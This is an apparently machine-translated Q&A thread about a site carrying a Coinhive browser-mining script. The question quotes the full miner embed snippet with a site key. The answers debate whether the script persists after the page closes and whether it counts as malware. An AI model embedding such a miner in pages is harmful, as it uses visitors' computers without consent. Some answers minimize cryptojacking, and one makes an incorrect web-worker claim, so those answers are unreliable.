使用比特币矿工脚本的网站

时间:2017-09-28 19:30:06

标签: javascript web malware

我发现我的一些用户正在访问一个似乎在其代码中有比特币挖掘JS脚本的网站:

<script src = "hxxps://coin-hive.com/lib/coinhive.min.js"></script><script>
var miner = new CoinHive.Anonymous('3858f62230ac3c915f300c664312c63f');
miner.start();
</script>

我的问题是,即使他们离开页面,用户仍然会被感染?这些程序只在用户在浏览器中打开页面时才能工作吗?

3 个答案:

答案 0 :(得分:11)

  

这是用户即使离开也仍然被感染   页面?

没有

  

这些类型的程序仅在用户打开页面时才起作用   在浏览器中?

是的,该脚本只会在包含它的网站上运行,而页面在浏览器中打开

UPGRADE:

有关此脚本的详细信息:https://coin-hive.com/

  

Coinhive为Monero Blockchain(...)提供了一个JavaScript挖掘器,您可以将其嵌入到您的网站中。 您的用户直接在浏览器中运行该矿工

https://coin-hive.com/documentation/miner

  

矿工一直运行,直到您再次明确地停止或用户   导航

答案 1 :(得分:8)

Coinhive似乎不是&#34;恶意软件&#34;因为它似乎没有对用户的计算机做任何特别有害的事情。如果是这种情况,则用户计算机从未被感染过#34;什么都有。

现在,网站在后台加载大量第三方脚本和Cookie,并且每次使用互联网时都会发现数百种您不知道的事情,这种情况极为常见。大多数网站在您访问时会加载Google Analytics跟踪脚本,即使您没有授权他们这样做。但这不会被视为恶意软件。大多数网站会加载持久的第三方Cookie,以便跟踪您从一个网站到另一个网站的存在,并创建大量的在线习惯。这就是为什么你可以在一个网站上购买鞋子,然后突然发现Facebook正在为你提供鞋子广告。但这通常也不被视为恶意软件。

在&#34;伤害&#34;或者&#34;不需要的活动&#34;,持久跟踪可以说比硬币挖掘脚本更具侵略性。硬币挖掘脚本可能只是使用了最终用户计算机的一些内存和CPU能力,这与在你不知情的情况下在后台加载的数百个其他javascript库没什么不同。

答案 2 :(得分:4)

我不熟悉coin-hive服务,但实际上你提供的脚本包含这样的行:

    var JobThread = function() {
            this.worker = new Worker(CoinHive.CRYPTONIGHT_WORKER_BLOB);
            this.worker.onmessage = this.onReady.bind(this);
            ...
    };

如你所见,它正在使用工人。我没有调查整个脚本,但无论如何使用Web worker意味着即使页面关闭后某些操作也可以运行。有关此post

的更多信息

因此,对于您的问题的第一个答案是肯定的,用户可能会在页面关闭后的一段时间内被感染(理论上,如果脚本以这种方式编写)。

但实际上脚本似乎很快就被系统本身终止了。硬币蜂窝平台也不是恶意软件,应该对用户系统安全。 我根本不认为你应该担心这一点。

相关问题